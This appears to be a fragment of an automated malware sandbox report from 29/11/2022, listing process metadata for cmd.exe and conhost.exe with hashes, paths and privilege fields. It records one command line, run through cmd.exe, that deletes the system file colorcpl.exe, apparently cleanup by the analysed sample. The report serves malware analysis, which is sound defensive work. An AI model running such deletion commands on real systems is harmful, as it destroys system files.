                                                      Start date:29/11/2022
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c del "C:\Windows\SysWOW64\colorcpl.exe"
                                                      Imagebase:0x11d0000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:11
                                                      Start time:18:25:38
                                                      Start date:29/11/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7fcd70000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Disassembly

                                                      No disassembly